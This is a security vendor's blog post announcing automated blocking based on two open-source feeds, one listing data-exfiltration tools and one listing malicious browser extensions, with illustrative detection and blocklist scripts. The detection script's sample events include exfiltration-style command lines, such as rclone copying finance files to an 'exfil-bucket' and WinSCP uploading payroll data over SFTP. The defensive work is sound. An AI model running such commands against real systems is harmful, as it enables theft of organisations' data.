Releases & Updates

LOLExfil and ExtSentry Intelligence: MagicSword Now Blocks Exfiltration Tools & Malicious Extensions

MagicSword now integrates LOLExfil and ExtSentry, two community intelligence sources that cover 200+ data exfiltration tools and a growing catalog of malicious browser extensions. Customers get automated blocking policies derived from both feeds without writing a single rule.

April 21, 2026 · 6 min read
MagicSword Intelligence Sources dashboard showing ExtSentry blocking 1,771 malicious browser extensions and LOLExfil blocking 187 data exfiltration tools, automated threat-driven application control

MagicSword now integrates two powerful community intelligence sources built around preventing living-off-the-land attacks, LOLExfil and ExtSentry, giving customers automated protection against data exfiltration tools and malicious browser extensions. Both projects are maintained by security researcher mthcht, whose work in threat hunting, detection engineering, and open-source intelligence continues to raise the bar for the defender community.

This integration means MagicSword customers get blocking policies derived from these feeds without writing a single rule. The intelligence is collected, normalized, and enforced across your fleet automatically.

The Two Problems Defenders Face

Data Exfiltration Hides Behind Legitimate Tools

Attackers don't build custom exfiltration tools when trusted software already does the job. Rclone syncs your data to an attacker-controlled cloud bucket. WinSCP transfers files over encrypted SSH sessions. AnyDesk and FileZilla move gigabytes while looking like routine IT activity. MEGA's encrypted uploads are indistinguishable from a developer backing up their work.

These tools are legitimate. They're signed. They pass application allowlists. And they're the same tools threat actors use to steal your data during every stage of a breach, from initial staging to final exfiltration.

The challenge: how do you build detection and prevention for 200+ tools across cloud storage, sync utilities, remote access software, tunneling protocols, and scripting interpreters, and keep that list current as new tools emerge?

Malicious Browser Extensions Operate in a Blind Spot

Browser extensions are the most under-monitored attack surface in enterprise environments. They auto-update silently through browser stores, install without IT oversight, and operate with broad permissions that can access user sessions, intercept requests, read page content, and steal credentials.

Most EDR security tools aren't built to monitor what happens inside the browser, making extensions a blind spot that traditional endpoint protection consistently misses.

In December 2024, a phishing campaign compromised 35 Chrome extensions affecting 2.6 million users. These were not obscure add-ons; they were widely trusted tools that turned malicious after their developers were phished. Once compromised, the extensions exfiltrated cookies, session tokens, and credentials while appearing completely normal.

The challenge: how do you maintain an up-to-date blocklist of malicious extension IDs across Chrome and Edge when the threat landscape shifts hourly?

What Is LOLExfil?

LOLExfil, Living Off The Land Exfiltration, is a comprehensive reference database cataloging 200+ tools across 10 categories that threat actors abuse for data exfiltration. Created and maintained by [mthcht](https://github.com/mthcht), it documents everything from cloud storage clients and sync utilities to tunneling protocols and scripting-based transfer methods.

What makes LOLExfil invaluable is the depth of each entry. Every tool listing includes:

- Endpoint and network detection patterns - the exact process names, command-line arguments, and filenames that appear during exfiltration

- MITRE ATT&CK mappings - technique IDs like T1567 (Exfiltration Over Web Service) and T1048 (Exfiltration Over Alternative Protocol) tied to each tool

- Simulation commands - test patterns for blue team exercises

- Forensic artifacts - disk, registry, and memory indicators for incident response

- IOCs - ports, pipes, service names, mutexes, and user-agents
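The entry fields listed above are what turns a catalogue into detection logic: process names narrow the candidate events, command-line patterns separate a transfer from the tool merely being present, and the ATT&CK mapping labels the result. The script below is an added example of that flow and is not code from LOLExfil or MagicSword; the `ExfilTool` schema, the regexes, and the process-creation events are constructed for illustration and simplify what the real entries contain (the ATT&CK IDs used are real technique IDs).

```python
import re
from dataclasses import dataclass

# Constructed, LOLExfil-style entries. The field names and patterns below are this
# example's own simplification, not the project's schema or its actual detection content.
@dataclass(frozen=True)
class ExfilTool:
    name: str
    category: str
    technique: str            # MITRE ATT&CK technique ID the tool is mapped to
    process_names: tuple      # lowercase executable names seen in process-creation events
    cmdline_patterns: tuple   # regexes that indicate a transfer, not just the tool running

TOOLS = (
    ExfilTool("Rclone", "Cloud Storage", "T1567",
              ("rclone.exe", "rclone"), (r"\b(copy|sync|move)\b",)),
    ExfilTool("MEGA", "Cloud Storage", "T1567",
              ("megacmd.exe", "mega-put", "megasync.exe"), (r"\bput\b",)),
    ExfilTool("WinSCP", "Sync & Transfer", "T1048",
              ("winscp.exe", "winscp.com"), (r"\b(put|synchronize)\b", r"sftp://")),
    ExfilTool("Ngrok", "SSH & Network", "T1572",   # T1572: Protocol Tunneling
              ("ngrok.exe", "ngrok"), (r"\b(tcp|http|tunnel)\b",)),
)

@dataclass(frozen=True)
class Finding:
    host: str
    tool: str
    technique: str
    confidence: str   # "high": tool plus transfer-style command line; "medium": tool process alone
    cmdline: str

def _basename(image_path: str) -> str:
    """Executable name from a Windows or POSIX path, lowercased for matching."""
    return re.split(r"[\\/]", image_path)[-1].lower()

def match_event(event: dict):
    """Return a Finding if the process-creation event involves a catalogued tool, else None."""
    image = _basename(event["image"])
    for tool in TOOLS:
        if image not in tool.process_names:
            continue
        transfer = any(re.search(p, event["cmdline"], re.IGNORECASE)
                       for p in tool.cmdline_patterns)
        return Finding(event["host"], tool.name, tool.technique,
                       "high" if transfer else "medium", event["cmdline"])
    return None

def scan(events) -> list:
    """Run every event through the catalogue and keep the hits, in input order."""
    return [f for f in map(match_event, events) if f is not None]

# Constructed process-creation events (not real telemetry); field names are this example's own.
SAMPLE_EVENTS = (
    {"host": "ws-017", "image": r"C:\Tools\rclone.exe",
     "cmdline": r"copy C:\Finance\Q1 offsite:exfil-bucket --transfers 8"},
    {"host": "ws-017", "image": r"C:\Program Files (x86)\WinSCP\winscp.com",
     "cmdline": r'/command "open sftp://ops@203.0.113.7/" "put C:\Share\payroll.xlsx /tmp/"'},
    {"host": "ws-042", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "/recycle"},
    {"host": "ws-042", "image": r"C:\Users\alice\Downloads\ngrok.exe",
     "cmdline": "tcp 3389"},
    # Tool present but only being configured: worth a lower-confidence finding, not a transfer.
    {"host": "srv-db1", "image": "/usr/bin/rclone", "cmdline": "config"},
)

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.tool} ({f.technique}) confidence={f.confidence} :: {f.cmdline}")
```

The two-tier confidence is the design point: a blocking policy can act on the process name alone, while a detection pipeline usually wants the command-line evidence of an actual transfer before paging anyone, and the ATT&CK ID carried on each finding lets both land in the same reporting.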

The categories span the full exfiltration landscape:

| Category | Examples |
|---|---|
| Cloud Storage | Rclone, MEGA, pCloud, Nextcloud |
| Sync & Transfer | WinSCP, FileZilla, Cyberduck |
| Remote Access | AnyDesk, RustDesk, TeamViewer |
| SaaS & Web | Discord webhooks, Telegram bots, Slack |
| SSH & Network | OpenSSH, Chisel, Ngrok |
| Scripting & LOLBin | BITSAdmin, CertReq, curl |
| Protocol | FTP, SMB, WebDAV |
| Backup | Duplicati, Restic, Veeam Agent |
| Staging | 7-Zip, WinRAR archiving before exfil |

GitHub | Website

What Is ExtSentry?

ExtSentry is a browser extension threat intelligence platform that converts community-curated threat data into actionable security feeds. Also created and maintained by mthcht, it aggregates intelligence from the mthcht/awesome-lists repository and other sources, publishing structured feeds of malicious, compromised, and suspicious browser extensions.

ExtSentry tracks extensions across multiple threat categories:

| Category | What It Covers |
|---|---|
| Malware | Extensions that actively deploy malicious payloads |
| Compromised | Legitimate extensions taken over by attackers (supply chain) |
| Scams | Extensions that deceive users for financial gain |
| PUP | Potentially unwanted programs with deceptive behavior |
| Crypto Theft | Extensions targeting cryptocurrency wallets and exchanges |
| Proxy/VPN Abuse | Extensions that route traffic through attacker infrastructure |
| Credential Access | Extensions designed to harvest login credentials |
| Defense Evasion | Extensions that tamper with security tooling |

Each indicator includes the Chromium extension ID, display name, category, threat type, severity, SHA-256 hash, and reference links. The feed updates every 45 minutes via GitHub Actions, meaning newly discovered malicious extensions propagate to your blocking policies within hours, not weeks.

ExtSentry also ships detection content in 16+ formats: STIX 2.1, MISP, Sigma rules, YARA rules, Suricata/Snort rules, Splunk lookups, Elastic NDJSON, Microsoft Sentinel KQL, and more. For MagicSword customers, we handle the hard part: you get the blocking policies automatically.
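Turning a feed of extension indicators into an enforceable browser policy is mostly about hygiene: validating IDs, collapsing duplicates that arrive under different categories, and choosing a severity floor. The script below is an added example of that step, written here for illustration; it is not ExtSentry's or MagicSword's code, the indicator records and the fleet inventory are constructed placeholders rather than feed data, and the field names are this example's own. The `ExtensionInstallBlocklist` key it emits is the real Chromium-family policy (honoured by Chrome and Edge); how it is delivered to endpoints is outside the example.

```python
import json
import re

# Chromium extension IDs are 32 characters drawn from the letters a-p.
EXT_ID_RE = re.compile(r"^[a-p]{32}$")
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Constructed, ExtSentry-style indicators. Field names, IDs, names and hashes are this
# example's own placeholders, not records from the real feed.
INDICATORS = [
    {"extension_id": "abcdefghijklmnopabcdefghijklmnop", "name": "Wallet Helper (constructed)",
     "category": "Crypto Theft", "severity": "critical", "sha256": "<constructed-sha256>"},
    {"extension_id": "ponmlkjihgfedcbaponmlkjihgfedcba", "name": "PDF Tools (constructed)",
     "category": "Compromised", "severity": "high", "sha256": "<constructed-sha256>"},
    # Same extension reported again under a second category: must not appear twice in the policy.
    {"extension_id": "abcdefghijklmnopabcdefghijklmnop", "name": "Wallet Helper (constructed)",
     "category": "Credential Access", "severity": "high", "sha256": "<constructed-sha256>"},
    # Malformed ID: a typo in a feed must be reported, not silently dropped or shipped.
    {"extension_id": "notavalidextensionid", "name": "Broken Record (constructed)",
     "category": "Malware", "severity": "critical", "sha256": "<constructed-sha256>"},
    {"extension_id": "a" * 32, "name": "Coupon Finder (constructed)",
     "category": "PUP", "severity": "low", "sha256": "<constructed-sha256>"},
]

def valid_extension_id(ext_id: str) -> bool:
    """True only for a well-formed, lowercase Chromium extension ID."""
    return bool(EXT_ID_RE.fullmatch(ext_id))

def build_blocklist(indicators, min_severity="medium"):
    """Return (sorted unique IDs at or above min_severity, raw IDs rejected as malformed)."""
    threshold = SEVERITY_RANK[min_severity]
    keep, rejected = set(), []
    for ind in indicators:
        ext_id = ind["extension_id"].strip().lower()
        if not valid_extension_id(ext_id):
            rejected.append(ind["extension_id"])
            continue
        if SEVERITY_RANK.get(ind["severity"], 0) >= threshold:
            keep.add(ext_id)
    return sorted(keep), rejected

def to_chromium_policy(ids) -> dict:
    """Policy fragment for Chromium-family browsers; ExtensionInstallBlocklist is the real key."""
    return {"ExtensionInstallBlocklist": list(ids)}

def installed_matches(inventory, ids):
    """Cross-check a fleet extension inventory against the blocklist; returns (host, id) pairs."""
    blocked = set(ids)
    return [(item["host"], item["extension_id"]) for item in inventory
            if item["extension_id"] in blocked]

# Constructed inventory of the kind an endpoint agent might report (not real data).
SAMPLE_INVENTORY = [
    {"host": "ws-017", "extension_id": "abcdefghijklmnopabcdefghijklmnop"},
    {"host": "ws-042", "extension_id": "c" * 32},
]

if __name__ == "__main__":
    ids, rejected = build_blocklist(INDICATORS, "medium")
    print(json.dumps(to_chromium_policy(ids), indent=2))
    print("rejected malformed IDs:", rejected)
    print("already installed on:", installed_matches(SAMPLE_INVENTORY, ids))
```

Blocking stops new installs; the `installed_matches` pass is what tells you which hosts already had a listed extension before the policy landed, which is where the inventory step referenced below earns its keep.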

GitHub | Website

Before you can block malicious extensions, you need to know what's running. Check out: Browser Extension Visibility: Why Inventory Changes the Game

Why This Matters for Defenders

Data exfiltration is the endgame of nearly every breach. Whether it's a ransomware operator staging data before encryption, an APT group siphoning intellectual property, or an insider using cloud sync tools to move files, the exfiltration step is where the damage happens. LOLExfil intelligence, enforced as blocking policy via MagicSword, removes the attacker's ability to use these tools on your endpoints entirely.

Browser extensions are the next frontier of supply chain attacks. Attackers are increasingly targeting extension developers through phishing and social engineering, turning trusted tools into credential stealers overnight. ExtSentry intelligence, enforced as browser policy via MagicSword, ensures your fleet blocks known-malicious extensions before they can harvest a single session token.

Together, these sources close two of the widest gaps in endpoint security:

- LOLExfil blocks the tools attackers use to get your data out

- ExtSentry blocks the extensions attackers use to steal credentials and sessions from inside the browser

This is intelligence-driven blocklisting in practice: threat data collected, normalized, and enforced before the attacker gets to use it.

Both are now part of MagicSword's growing intelligence catalog, alongside the other sources shown below.

MagicSword Intelligence Sources catalog showing 20 threat intelligence feeds including LOLBAS, LOLDrivers, LOLRMM, ExtSentry, LOLExfil, Cert Graveyard, MagicSword Intel Blocklist, and Microsoft block rules — all platforms, updated automatically for threat-driven application control

Credit Where It's Due

This integration is built on the work of mthcht, a security researcher focused on threat hunting, DFIR, and detection engineering who has built an impressive portfolio of open-source intelligence projects. Beyond LOLExfil and ExtSentry, mthcht maintains ThreatHunting-Keywords, awesome-lists for SOC/CERT teams, and several other community resources including LOLC2, BADGUIDs, and SINKHOLED.

Projects like LOLExfil and ExtSentry represent the best of community-driven security research: freely available, actively maintained, and structured for operational use. MagicSword is proud to operationalize this work and put it directly into the hands of defenders as automated blocking policy.

Follow mthcht's work:

GitHub · X/Twitter · Bluesky · Medium

Already a MagicSword customer? LOLExfil and ExtSentry intelligence sources are available now in your Intelligence dashboard. Navigate to Policies and attach them to your policies to start blocking exfiltration tools and malicious browser extensions across your fleet.

Evaluating MagicSword? Book a demo to see how automated intelligence enforcement works across Windows, macOS, and Linux endpoints, from Application Control policies to browser extension control.

Want to stay informed? Subscribe to our newsletter for the latest intelligence integrations, product updates, and threat research.

Written by

Michael Haag, Threat Researcher

In the intricate chessboard of cybersecurity, my role oscillates between a master tactician and a relentless hunter. As an expert in detection engineering and threat hunting, I don't just respond to the digital threats, I anticipate them, ensuring that the digital realm remains sovereign.